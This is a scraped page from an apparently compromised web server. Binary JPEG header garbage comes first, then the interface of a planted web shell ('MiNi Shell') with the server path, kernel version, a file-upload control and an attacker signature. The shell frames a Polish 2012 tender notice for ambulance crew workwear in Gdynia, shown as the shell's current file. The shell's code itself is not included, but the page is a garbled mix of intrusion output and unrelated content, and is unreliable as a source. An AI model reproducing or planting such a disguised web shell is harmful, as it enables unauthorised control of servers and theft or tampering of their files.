JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120907/337378-N-2012.html

<p class="kh_header"><b>Gdynia: postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego na dostawę odzieży roboczej do Miejskiej Stacji Pogotowia Ratunkowego w Gdyni Samodzielny Zakład Opieki Zdrowotnej, Znak: MSPR/ZP/N/06/2012</b><br>
<b>Numer ogłoszenia: 337378 - 2012; data zamieszczenia: 07.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Stacja Pogotowia Ratunkowego Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Żwirki i Wigury 14, 81-394 Gdynia, woj. pomorskie, tel. (058) 660 88 11, faks (058) 660 88 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego na dostawę odzieży roboczej do Miejskiej Stacji Pogotowia Ratunkowego w Gdyni Samodzielny Zakład Opieki Zdrowotnej, Znak: MSPR/ZP/N/06/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa odzieży roboczej do Miejskiej Stacji Pogotowia Ratunkowego w Gdyni SPZOZ, spełniającej poniższe, graniczne (bezwzględnie wymagane) parametry techniczno-użytkoweoraz szczegółowe rozmiary zamawianej odzieży roboczej, sprecyzowane w załączniku nr 5 do SIWZ, przy czym Zamawiający nie dopuszcza zaoferowania odzieży roboczej o ogólnych rozmiarach określanych S, M, L, XL, XXL z wyjątkiem koszulki z krótkimi rękawami
SPODNIE CAŁOSEZONOWE do pasa spodnie kolor - fluorescencyjny czerwony - zgodnie z PN-EN 471+A1 2010, bawełniane lub mieszanki - bawełna/poliester minimum 33% bawełny, minimalna powierzchnia materiału tła 0,5 m2, materiał odblaskowy mocowany na stałe, spełniający wymagania PN-EN 471+A1 2010, poniżej uda wokół całego obwodu nogawek na trwale przymocowane po dwa pasy z materiału odblaskowego o szerokości 5 cm, minimalna powierzchnia materiału odblaskowego o gramaturze 0,13 m2, poniżej pasa z boku dwie kieszenie zewnętrzne zabezpieczone patkami zapinanymi na rzep; kieszenie o wym.: 240 x 180 mm wszywane pod skosem, ułatwiające sięganie po sprzęt w pozycji siedzącej klęczącej, z tyłu spodni  dwie kieszenie wewnętrzne zabezpieczone patkami zapinane na nap o powierzchni całkowicie nie ścieralnej, z boku spodni na wysokości 0,5 uda dwie kieszenie zewnętrzne zabezpieczone patkami zapinane na rzep, wzmocnienia spodni na kolanach, w kroczu i na pośladkach (celem wzmocnienia wytrzymałości), u góry szlufki na szeroki pas, wzmacniane ryglem, umożliwiające swobodne wciąganie pasa nośnego o szerokości 5 cm, spodnie zapinane na zamek spiralny oraz zatrzask typu nap o powierzchni całkowicie  nieścieralnej, spodnie szyte nićmi spełniającymi wymogi normy PN-EN 12590 2002, spodnie mogą być wyposażone w podszewkę z tkaniny paro przepuszczalnej, zgodną z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego, spodnie mogą być wyposażone we wstawki w kolorze czarnym w miejscach szczególnie narażonych na zabrudzenia, zgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego.
BLUZA TYPU POLAR (z możliwością wpięcia do kurtki całosezonowej) bluza z lekkiej dzianiny oddychającej koloru czerwonego fluorescencyjnego zgodnego z PN-EN 471+A1 2010; wewnętrzna warstwa dzianiny pochłania wydzielany podczas wysiłku pot i odprowadza go na zewnątrz, materiał z którego wykonana jest bluza powinien być o gramaturze 390gm2, zapewniającej nie nasiąkanie wodą, zabezpieczony przed pilingacją, mankiety rękawów zakończone regulacją wykonane z taśmy sczepnej, zaopatrzone w zakończenia z tworzywa sztucznego ułatwiające uchwyt w rękawiczkach diagnostycznych. bluza zapinana na zamek błyskawiczny rozdzielczy kostkowy, dodatkowo zakończony uchwytem z tworzywa sztucznego, umożliwiającym chwytanie w rękawiczkach diagnostycznych. bluza zaopatrzona we wzmocnienia z tkaniny z poliamidu z odporną powłoką poliuretanową, z zastosowaniem na karczku w długości pomiędzy rękawami oraz na łokciach, (zabezpieczająca ponadto przed przemakaniem),  w kolorze czarnym zgodnym z PN-EN 471+A1 2010 lub zamiast wzmocnień z tkaniny poliamidu wstawki w kolorze czarnym z dzianiny zgodnej z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego. bluza powinna posiadać dwie kieszenie wcięte po bokach, zapinane na zamek kostkowy koloru czarnego oraz po dwie kieszenie naszywane po wewnętrznej stronie na wysokości piersi zabezpieczone na rzep lub zamek kostkowy, dodatkowo bluza powinna posiadać system termoregulacji i odprowadzania potu znajdujący się pod pachami - dla zwiększenia komfortu użytkownika, oznakowanie bluzy typu polar: na plecach emblemat haftowany z oznaczeniem Ratownictwo Medyczne Gdynia wykonana na materiale odblaskowym a po środku i poniżej napisu emblemat sygnowany symbolem medycznym krzyża św. Andrzeja także na materiale odblaskowym, na wysokości piersi po lewej stronie naszywka z wzorem graficznym systemu Polskie Ratownictwo Medyczne wykonana na materiale odblaskowym, według wzoru stanowiącego załącznik nr 1 do Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego, po prawej stronie na wysokości klatki piersiowej naszywka lub nadruk z oznakowaniem funkcji w języku polskim oraz w języku angielskim (szczegółowe informacje dotyczące funkcji i ilości asortymentu oznaczonego konkretną funkcją zostaną wskazane Wykonawcy, któremu zostanie udzielone przedmiotowe zamówienie, przy zawieraniu umowy) lub emblemat funkcyjny mocowany za pomocą taśmy samoszczepnej rzep zgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego. zamek bluzy typu polar kompatybilny z zamkiem wewnętrznym kurtki całosezonowej do jego wpięcia na zasadzie ocieplacza. Zamawiający wymaga aby bluza podpinka do kurtki była zgodna z normą  PN-EN 14058 2007 dot. ciepłochronności zgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego
KURTKA CAŁOSEZONOWA (z możliwością utworzenia podpinki z polaru): kurtka z długimi rękawami dopinanymi zamkiem błyskawicznym rozdzielczym, kostkowym czarnym, wykonana z lekkiej dzianiny wiatro i wodoodpornej, szyta nićmi spełniającymi wymogi normy PN-EN 12590 2002, materiał lub układy materiałów o właściwościach paraprzepuszczalnych, spełniających wymogi norm PN-EN 343+A1 2008, o klasie 3 w zakresie wodoszczelności oraz w co najmniej 2 klasie oporu pary wodnej, o odpornościach wybarwień spełniających wymagania normy PN-P 84525 1998, lub materiał lub układ materiałów spełniających wymogi PN-EN 343+A1 2008 najmniej 2 klasa w zakresie wodoszczelności i w zakresie oporu pary wodnejzgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego. barwa fluorescencyjna czerwona zgodnie z PN-EN 471+A1 2010, o minimalnej powierzchni materiału tła 0,5 m2,  materiał odblaskowy mocowany na stałe, spełniający wymagania PN-EN 471+A1 2010 na dole (nie mniej niż 5 cm od dolnej krawędzi) wokół całego obwodu kurtki pas odblaskowy umieszczony poziomo o szerokości 5 cm, nad ściągaczem w pasie (nie mniej niż 5 cm od dolnego pasa odblaskowego) wokół całego obwodu kurtki pas odblaskowy umieszczony poziomo o szerokości 5 cm, całkowita minimalna powierzchnia materiału odblaskowego 0,13 m2, paski odblaskowe o odblaskowości początkowej 500 cd lx m2, rozmieszczenie i ilość kieszeni (kieszenie z zachowaniem wymaganych powierzchni materiałów - tła i odblaskowego) front kurtki zaopatrzony w dwie kieszenie zewnętrzne na piersi zamykane na zamek błyskawiczny wiatro i wodoodporny czarny wszyty pod skosem celem łatwego sięgania do sprzętu, w kieszeń na telefon służbowy umieszczoną na stronie lewej piersi i obok kieszeni piersiowej - lewej, zapinanej na taśmę sczepną lub kieszeń na telefon służbowy na kieszeni napoleońskiej po prawej stronie na klatce piersiowej zgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego, w dwie kieszenie wewnętrzne na wysokości klatki piersiowej i zapinane na zamek błyskawiczny-kostkowy, w dwie kieszenie wewnętrzne na przedramionach kurtki, zabezpieczone na zamek błyskawiczny- rozdzielczy kostkowy, czarny, kurtka dodatkowo posiada po lewej stronie kieszeń wewnętrzną typu napoleońskiego. wszystkie krawędzie kieszeni dodatkowo wzmocnione ryglem o tym samym kolorze  co kurtka, mankiety zakończone regulacją wykonaną z taśmy sczepnej na rzep,  bluza zapinana na zamek błyskawiczny rozdzielczy kostkowy czerwony dodatkowo zakończony uchwytem z tworzywa sztucznego umożliwiającym chwytanie w rękawiczkach diagnostycznych, chroniony plisą dla zwiększenia wiatroodporności kurtki, kaptur z tego samego materiału co kurtka, dopinany na zamek błyskawiczny, rozdzielczy, kostkowy czarny, zabezpieczony patką z końcówką taśmy sczepnej  z jednej strony oraz z rzepem z drugiej strony o szerokości umożliwiającej regulację wysokości zapięcia lub kaptur doszyty na stałe, chowany w stójcezgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego, w tym wyprofilowany kaptur z daszkiem, ściągany gumą ze stoperami w części twarzowejzgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego. u dołu kurtka powinna mieć ściągacz typu gumo-suwak, wprowadzony w prowadnicę typu kieszeń wewnętrzna, sznur z końcówkami zabezpieczającymi jego przypadkowe wciągnięcie do kieszeni prowadnicy, oznakowanie kurtki całosezonowej:tył kurtki winien posiadać oznaczenia wzór graficzny systemu oraz nazwę funkcjizgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego, na lewym rękawie wzór graficzny systemu Państwowe Ratownictwo Medycznew postaci nadruku na materiale odblaskowymzgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego, na prawym rękawie emblemat odblaskowy Ratownictwo Medyczne Gdynia z wzorem graficznym krzyża św. Andrzeja, z przodu na lewej górnej kieszeni emblemat funkcyjności w języku polskim i angielskim w postaci naszywki lub taśmy samosczepnejzgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego (szczegółowe informacje dotyczące funkcji i ilości asortymentu oznaczonego konkretną funkcją zawarte są w treści załącznika nr 5 do SIWZ) od wewnętrznej strony kurtki wszyty zamek umożliwiający połączenie kurtki całosezonowej oraz bluzy typu polar na zasadzie utworzenia podpinki. kurtka może być wyposażone we wstawki w kolorze czarnym w miejscach szczególnie narażonych na zabrudzenia, zgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego.
KOSZULKA Z KRÓTKIMI RĘKAWAMI materiał i barwa (fluorescencyjna czerwona) zgodnie z PN-EN 471+A1 2010, o oporze pary wodnej nie większym niż 5 m2xPazgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego. oznakowanie: z przodu po lewej stronie wzór graficzny systemu Państwowe Ratownictwo Medycznezgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w niniejszym postępowaniu nastąpi przy zastosowaniu formuły: spełnia/nie spełnia w oparciu o oświadczenie złożone przez Wykonawcę, zgodne z Załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w niniejszym postępowaniu nastąpi przy zastosowaniu formuły: spełnia/nie spełnia w oparciu o oświadczenie złożone przez Wykonawcę, zgodne z Załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w niniejszym postępowaniu nastąpi przy zastosowaniu formuły: spełnia/nie spełnia w oparciu o oświadczenie złożone przez Wykonawcę, zgodne z Załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w niniejszym postępowaniu nastąpi przy zastosowaniu formuły: spełnia/nie spełnia w oparciu o oświadczenie złożone przez Wykonawcę, zgodne z Załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w niniejszym postępowaniu nastąpi przy zastosowaniu formuły: spełnia/nie spełnia w oparciu o oświadczenie złożone przez Wykonawcę, zgodne z Załącznikiem nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. oświadczenie (w formularzu ofertowym na załączniku numer 1 do SIWZ), że oferowany asortyment posiada niezbędne pozwolenia, świadectwa, deklaracje zgodności i certyfikaty CE, dopuszczające go do stosowania i obrotu na terenie Polski i krajów UE oraz, że spełnia normy o których mowa w treści opisu przedmiotu zamówieniai Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w zakresie umundurowania członków Zespołów Ratownictwa Medycznego,
2. oryginały lub poświadczone za zgodność z oryginałem przez Wykonawcę kopie dokumentów wskazujących, iż  oferowany przedmiot zamówienia spełnia normy PN-EN 471+A1:2010, PN-EN 343+A1:2008, oraz PN-EN 12590:2002.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony Formularz Oferty - stanowiący załącznik nr 1 do SIWZ.
2)wypełniony Formularza Cenowy - stanowiący załącznik nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmiany ceny jednostkowej brutto poszczególnego asortymentu, w przypadku ustawowej zmiany stawki podatku VAT,
2)	wprowadzenia wszelkich zmian wynikających z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy, a zmiany te są korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pogotowie.gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Stacja Pogotowia Ratunkowego w Gdyni Samodzielny Publiczny Zakład Opieki Zdrowotnej, ul. Żwirki i Wigury 14, 81-394 Gdynia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2012 godzina 10:00, miejsce: Miejska Stacja Pogotowia Ratunkowego w Gdyni, ul. Żwirki i Wigury 14, 81-394 Gdynia, Dział  zamówień publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com